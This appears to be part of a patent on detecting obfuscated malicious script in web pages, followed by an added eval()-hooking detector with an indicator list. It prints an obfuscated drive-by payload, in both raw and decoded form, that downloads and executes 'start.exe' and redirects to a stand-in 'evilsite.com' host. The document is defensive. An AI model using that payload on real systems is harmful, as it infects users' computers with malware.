Computers are often subject to attack in various forms. One form of attack is malware such as computer viruses, worms, etc. Another form of attack attempts to exploit a vulnerability in a computer, such as a denial of service, a buffer overflow, etc. Intrusion detection systems (IDSs) are known to identify and block attacks such as malware and attempted exploits based on their signature, patterns of behavior and/or heuristics. (“Heuristics” are a series of conditions which, in combination, indicate a likely attack.) Another form of attack is obfuscated JavaScript code or Visual Basic script code embedded in an HTML or associated files and targeted at a web browser. Such obfuscated script code is not apparent or operational until executed by a script execution engine in a web browser. Such execution revises the original, non-operational, obfuscated script code received from the HTML or associated file into operational (non-obfuscated) script code. The known IDS may not detect the attack when obfuscated, because the known IDS scans the code from the HTML or associated files before the code is executed and converted into the revised, operational, non-obfuscated script code. Thus, the known IDS may pass the obfuscated script code to the web browser, and the web browser may convert the original program code into the revised, operational script code for execution. Such execution may harm the client computer.
The following is a known example of an attack using obfuscated JavaScript code. As illustrated in FIG. 1 representing the Prior Art, a client computer 20 receives an HTML requested by a user of the client computer. The HTML (or associated files) includes obfuscated, non-operational JavaScript code, such as the following:
<html><script><!--
function f(b, a, c) { return a + b + c; }
function g(b, a) { return a + b; }
var s = new Array("", "start.exe", "http://evilsite.com ", "object", "classid",
  f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")),
  g(f("ft.XMLH", "oso", "TTP"), "Micr"), f("E", "G", "T"), f(g(".Str", "odb"), "Ad", "eam"),
  f(g(".She", "ipt"), "WScr", "ll"), "PROCESS", "TMP", "/[^/]*$", "/", "\\");
eval('a = document.createElement(s[3]); a.setAttribute(s[4], s[5]); with(a.CreateObject(s[6], s[0])) { open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false); send(); if(status < 400) with(a.CreateObject(s[8], s[0])) { Type = 1; Open(); Write(responseBody); with(a.CreateObject(s[9], s[0])) { c = Environment(s[10])(s[11]) + s[14] + s[1]; SaveToFile(c, 2); Exec(c); } } } location.replace(s[2]);');
// --></script></html>

A known IDS 14 scans the HTML for an attack. However, because of the obfuscation of the JavaScript code, the known IDS does not detect the attack, and invokes a known web browser 28 to process the HTML. The web browser 28 calls a known Document Object Model (“DOM”) 22 in the web browser. In response, a program function 26 within the DOM 22 “renders” static components of the HTML, i.e. converts non-executable portions of the document for display in the client computer. Another program function 27 in the DOM 22 identifies program code in the HTML or associated files and forwards the program code to a JavaScript Engine (“JSE”) 24 for an iteration of execution. In the illustrated example, the first iteration of execution of the JavaScript code by the JSE yields the following revised JavaScript code:
a = document.createElement("object");
a.setAttribute("clsid", "XMLHTTP");
with(a.CreateObject("XMLHTTP", "")) {
  open("GET", location.href.replace(new RegExp("/[^/]$"), "/start.exe"), false);
  send();
  if(status < 400) with(a.CreateObject("Adodb.Stream", "")) {
    Type = 1;
    Open();
    Write(responseBody);
    with(a.CreateObject("WScript.Shell", "")) {
      c = Environment("PROCESS")("TMP\start.exe");
      SaveToFile(c, 2);
      Exec(c);
    }
  }
}
location.replace("http://evilsite.com");

In this example, the revised JavaScript code, when executed, will exploit a vulnerability on the client computer to download and run a malicious program file called “start.exe”. Next, the JSE loops back to its call address to execute the now operational, malicious, revised JavaScript code. The execution of the operational, malicious, revised JavaScript code by the JSE 24 results in a successful attack on the client computer.
For some obfuscated JavaScript code, the operational form of the JavaScript code may not result until multiple iterations of processing and execution by the JSE, with each iteration of processing and execution by the JSE revising the JavaScript code one more time. Nevertheless, the operational malicious JavaScript code is ultimately generated and executed and harms the client computer.
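The following is an added example, not the patent's own code, that illustrates the detection gap described above and one defensive way to close it: a pre-execution signature scan of the raw script sees only fragments, whereas a guard placed on eval() sees the text produced by each iteration of the script engine and can scan it before it runs. The indicator strings are taken from the revised JavaScript shown above; the indicator list, the eval() hook, and the constructed sample scripts are assumptions for this illustration and do not describe the mechanism the patent itself claims. The sample exploits nothing: its deobfuscated text merely assigns strings to variables.

```javascript
// Added example (not the patent's code): intercept the script engine's eval()
// so that the text produced by each deobfuscation iteration is scanned for
// indicators before it is executed. Indicator strings come from the revised
// JavaScript shown in the text; the list itself is an assumption.
const INDICATORS = ["XMLHTTP", "Adodb.Stream", "WScript.Shell", "start.exe"];

// Substring signature scan of one piece of script text (stand-in for an IDS
// signature match). Returns the indicators found.
function scanText(text) {
  return INDICATORS.filter((ind) => text.includes(ind));
}

// Execute scriptText with eval() shadowed by a guard. Every string handed to
// eval is scanned first; on a match, execution stops and the report records at
// which iteration the operational form appeared. Each iteration's output is
// itself run with the same guard, so nested eval() calls (multiple revisions)
// are intercepted in the same way.
function runGuarded(scriptText, maxIterations = 10) {
  const report = {
    staticHits: scanText(scriptText), // what a pre-execution scan sees
    iterations: 0,
    blocked: false,
    blockedAt: null,
    hits: [],
  };

  function guardedEval(code) {
    if (typeof code !== "string") return code; // eval(non-string) returns it unchanged
    report.iterations += 1;
    if (report.iterations > maxIterations) {
      throw new Error("deobfuscation iteration limit reached");
    }
    const hits = scanText(code);
    if (hits.length > 0) {
      report.blocked = true;
      report.blockedAt = report.iterations;
      report.hits = hits;
      throw new Error("blocked: " + hits.join(", "));
    }
    // Simplification: the revised text runs in a fresh function scope rather
    // than in the caller's scope as a real direct eval would.
    return new Function("eval", code)(guardedEval);
  }

  try {
    new Function("eval", scriptText)(guardedEval);
  } catch (err) {
    if (!report.blocked) throw err; // only swallow our own block decision
  }
  return report;
}

// Constructed sample in the style of the page's f()/g() helpers: the raw text
// holds only fragments, the first eval() rebuilds them, and only the second
// (nested) eval() receives the indicator string in one piece.
const SAMPLE = `
function g(b, a) { return a + b; }
var s = [g("od", "Ad"), g("tream", "b.S")];
eval('var h = "' + s[0] + '" + "' + s[1] + '"; eval("var u = " + JSON.stringify(h) + ";");');
`;

// Constructed benign script that also uses eval(), to show it is not blocked.
const BENIGN = 'eval("var y = 6 * 7;");';

console.log(JSON.stringify(runGuarded(SAMPLE)));
console.log(JSON.stringify(runGuarded(BENIGN)));
```

Running the block reports no static hits for SAMPLE, no hit after the first iteration, and a block at the second iteration on "Adodb.Stream", while BENIGN completes in one iteration unblocked. A production hook would have to cover every string-to-code path the engine offers (indirect eval, the Function constructor, setTimeout with a string argument, document.write), and the substring match here only stands in for the IDS's own signature and heuristic rules.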
An object of the present invention is to detect obfuscated malicious code in an HTML and associated files, or the like, and prevent its harmful execution.
Another object of the present invention is to detect obfuscated malicious script code in an HTML and associated files, or the like, and prevent its harmful execution.
Another object of the present invention is to detect obfuscated malicious code in an HTML and associated files, or the like, and prevent its harmful execution despite multiple iterations of processing and execution required to revise the malicious code into an operational form.